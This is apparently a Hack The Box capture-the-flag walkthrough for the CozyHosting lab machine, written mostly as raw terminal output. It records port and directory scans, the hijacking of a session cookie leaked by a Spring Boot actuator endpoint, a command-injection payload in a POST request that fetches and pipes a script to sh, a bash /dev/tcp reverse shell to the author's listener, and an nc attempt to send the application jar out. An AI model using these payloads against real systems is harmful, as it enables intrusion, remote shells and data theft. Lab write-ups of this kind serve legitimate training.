htbcozyhosting

HTB-CozyHosting

app.hackthebox.com/machines/Co…

──(kwkl㉿kwkl)-[~]
└─$ tail -l /etc/hosts                                                                                                                                                       1 ⨯
​
​
​
10.10.11.230 cozyhosting.htb
​

──(kwkl㉿kwkl)-[~]
└─$ nmap -A 10.10.11.230 -T4 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-23 20:47 HKT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 7.27% done; ETC: 20:50 (0:02:59 remaining)
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 10.12% done; ETC: 20:50 (0:02:31 remaining)
Nmap scan report for 10.10.11.230 (10.10.11.230)
Host is up (0.61s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
9999/tcp open  abyss?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.99 seconds
                                                                  

┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
└─$ sudo ./fscan_amd64 -h 10.10.11.230   
​
   ___                              _    
  / _      ___  ___ _ __ __ _  ___| | __ 
 / /_/____/ __|/ __| '__/ _` |/ __| |/ /
/ /________  (__| | | (_| | (__|   <    
____/     |___/___|_|  __,_|___|_|_   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 10.10.11.230    is alive
[*] Icmp alive hosts len is: 1
10.10.11.230:8000 open
10.10.11.230:22 open
10.10.11.230:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://10.10.11.230       code:301 len:178    title:301 Moved Permanently 跳转url: http://cozyhosting.htb
[*] WebTitle: http://cozyhosting.htb    code:200 len:12706  title:Cozy Hosting - Home
已完成 1/3 [-] ssh 10.10.11.230:22 root 123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
[+] http://cozyhosting.htb poc-yaml-springboot-env-unauth spring2
已完成 2/3 [-] ssh 10.10.11.230:22 root root123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root 123456~a ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root sysadmin ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/3
[*] 扫描结束,耗时: 7m6.791807771s
​

┌──(kwkl㉿kwkl)-[~/tools/scan_tool/dirsearch-0.4.3]
└─$ ./dirsearch.py -u http://cozyhosting.htb/                                                                                                                                1 ⨯
​
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )
​
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
​
Output File: /home/kwkl/tools/scan_tool/dirsearch-0.4.3/reports/http_cozyhosting.htb/__23-09-30_10-56-44.txt
​
Target: http://cozyhosting.htb/
​
[10:56:44] Starting:                                                                                                                                                             
[10:57:32] 200 -    0B  - /;/login                                          
[10:57:32] 200 -    0B  - /;/json
[10:57:32] 200 -    0B  - /;/admin
[10:57:32] 200 -    0B  - /;admin/
[10:57:32] 200 -    0B  - /;login/
[10:57:32] 200 -    0B  - /;json/                                           
[10:57:32] 400 -  435B  - /..................etcpasswd
[10:57:35] 400 -  435B  - /a%5c.aspx                                        
[10:57:38] 200 -    0B  - /actuator/;/auditevents                           
[10:57:38] 200 -    0B  - /actuator/;/auditLog                              
[10:57:39] 200 -  634B  - /actuator                                         
[10:57:39] 200 -    0B  - /actuator/;/conditions
[10:57:39] 200 -    0B  - /actuator/;/caches
[10:57:39] 200 -    0B  - /actuator/;/configprops
[10:57:39] 200 -    0B  - /actuator/;/beans
[10:57:39] 200 -    0B  - /actuator/;/configurationMetadata
[10:57:39] 200 -    0B  - /actuator/;/dump
[10:57:39] 200 -    0B  - /actuator/;/env
[10:57:39] 200 -    0B  - /actuator/;/features
[10:57:39] 200 -    0B  - /actuator/;/flyway
[10:57:39] 200 -    0B  - /actuator/;/events
[10:57:39] 200 -    0B  - /actuator/;/exportRegisteredServices
[10:57:39] 200 -    0B  - /actuator/;/health
[10:57:39] 200 -    0B  - /actuator/;/heapdump
[10:57:39] 200 -    0B  - /actuator/;/info
[10:57:39] 200 -    0B  - /actuator/;/httptrace
[10:57:39] 200 -    0B  - /actuator/;/healthcheck
[10:57:39] 200 -    0B  - /actuator/;/logfile
[10:57:39] 200 -    0B  - /actuator/;/jolokia
[10:57:39] 200 -    0B  - /actuator/;/loggers
[10:57:39] 200 -    0B  - /actuator/;/loggingConfig
[10:57:39] 200 -    0B  - /actuator/;/prometheus
[10:57:39] 200 -    0B  - /actuator/;/integrationgraph
[10:57:39] 200 -    0B  - /actuator/;/liquibase
[10:57:39] 200 -    0B  - /actuator/;/mappings
[10:57:39] 200 -    0B  - /actuator/;/metrics
[10:57:39] 200 -    0B  - /actuator/;/refresh
[10:57:39] 200 -    0B  - /actuator/;/registeredServices
[10:57:39] 200 -    0B  - /actuator/;/sessions
[10:57:39] 200 -    0B  - /actuator/;/releaseAttributes
[10:57:39] 200 -    0B  - /actuator/;/resolveAttributes
[10:57:39] 200 -    0B  - /actuator/;/ssoSessions
[10:57:39] 200 -    0B  - /actuator/;/sso
[10:57:39] 200 -    0B  - /actuator/;/scheduledtasks
[10:57:39] 200 -    0B  - /actuator/;/shutdown
[10:57:39] 200 -    0B  - /actuator/;/springWebflow
[10:57:39] 200 -    0B  - /actuator/;/statistics
[10:57:39] 200 -    0B  - /actuator/;/status
[10:57:39] 200 -    0B  - /actuator/;/trace
[10:57:39] 200 -    0B  - /actuator/;/threaddump
[10:57:40] 200 -    5KB - /actuator/env                                     
[10:57:40] 200 -   15B  - /actuator/health                                  
[10:57:41] 200 -   10KB - /actuator/mappings                                
[10:57:41] 200 -   98B  - /actuator/sessions                                
[10:57:43] 200 -  124KB - /actuator/beans                                   
[10:57:45] 401 -   97B  - /admin                                            
[10:57:47] 200 -    0B  - /admin/%3bindex/                                  
[10:57:54] 200 -    0B  - /Admin;/                                          
[10:57:54] 200 -    0B  - /admin;/                                          
[10:58:28] 200 -    0B  - /axis//happyaxis.jsp                              
[10:58:28] 200 -    0B  - /axis2-web//HappyAxis.jsp                         
[10:58:28] 200 -    0B  - /axis2//axis2-web/HappyAxis.jsp                   
[10:58:38] 200 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
[10:59:02] 200 -    0B  - /engine/classes/swfupload//swfupload_f9.swf       
[10:59:02] 200 -    0B  - /engine/classes/swfupload//swfupload.swf
[10:59:02] 500 -   73B  - /error                                            
[10:59:04] 200 -    0B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/ 
[10:59:05] 200 -    0B  - /extjs/resources//charts.swf                      
[10:59:28] 200 -    0B  - /html/js/misc/swfupload//swfupload.swf            
[10:59:35] 200 -    0B  - /jkstatus;                                        
[10:59:40] 200 -    4KB - /login                                            
[10:59:41] 200 -    0B  - /login.wdm%2e                                     
[10:59:42] 204 -    0B  - /logout                                           
                                                                             
Task Completed                                                                                                                                                                   
                 

Find. sessions

cozyhosting.htb/actuator/se…

F0FD1F42518BC0B9959B98BED562DC79 "kanderson"

Using this sessionid

we can login in. As kanderson

kanderson%20||%20whoami

;'id'

http://10.10.16.51:5555/1@1

many times try

 ┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
└─$ cat 1@1      
bash -c "bash -i>& /dev/tcp/10.10.16.51/6666 0>&1"
                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.16.51 - - [01/Oct/2023 22:17:55] "GET /1@1 HTTP/1.1" 200 -
10.10.16.51 - - [01/Oct/2023 22:18:04] "GET /1@1 HTTP/1.1" 200 -
10.10.11.230 - - [01/Oct/2023 22:18:52] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:18:52] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:19:59] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:19:59] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:20:42] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:20:42] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:11] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:22:11] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:31] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:22:31] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:47] "GET /1@1 HTTP/1.1" 200 -
10.10.11.230 - - [01/Oct/2023 22:35:39] "GET /1@1 HTTP/1.1" 200 -
​

┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666                                                                                                                                                          130 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
​

raw head

POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin
Cookie: JSESSIONID=7BFD184ED7E857BC1FDD473077783C27//
Upgrade-Insecure-Requests: 1
​
host=1&username=;kanderson||curl$IFS$9http://10.10.16.51:5555/1@1|sh%0a

HTTP/1.1 504 Gateway Time-out
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Oct 2023 14:36:38 GMT
Content-Type: text/html
Content-Length: 176
Connection: close
​

504 Gateway Time-out

504 Gateway Time-out
nginx/1.18.0 (Ubuntu)


​

nc op！

​

┌──(kwkl㉿kwkl)-[~]

└─$ nc -lvvp 6666                                                                                                                                                          130 ⨯

Ncat: Version 7.93 ( https://nmap.org/ncat )

Ncat: Listening on :::6666

Ncat: Listening on 0.0.0.0:6666

Ncat: Connection from 10.10.11.230.

Ncat: Connection from 10.10.11.230:55596.

bash: cannot set terminal process group (1063): Inappropriate ioctl for device

bash: no job control in this shell

app@cozyhosting:/app$ id

​

​

app@cozyhosting:/app$ id

id

uid=1001(app) gid=1001(app) groups=1001(app)

app@cozyhosting:/app$ ls

ls

cloudhosting-0.0.1.jar

app@cozyhosting:/app$ ls -al

ls -al

total 58856

drwxr-xr-x  2 root root     4096 Aug 14 14:11 .

drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..

-rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar

app@cozyhosting:/app$ nc 10.10.16.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar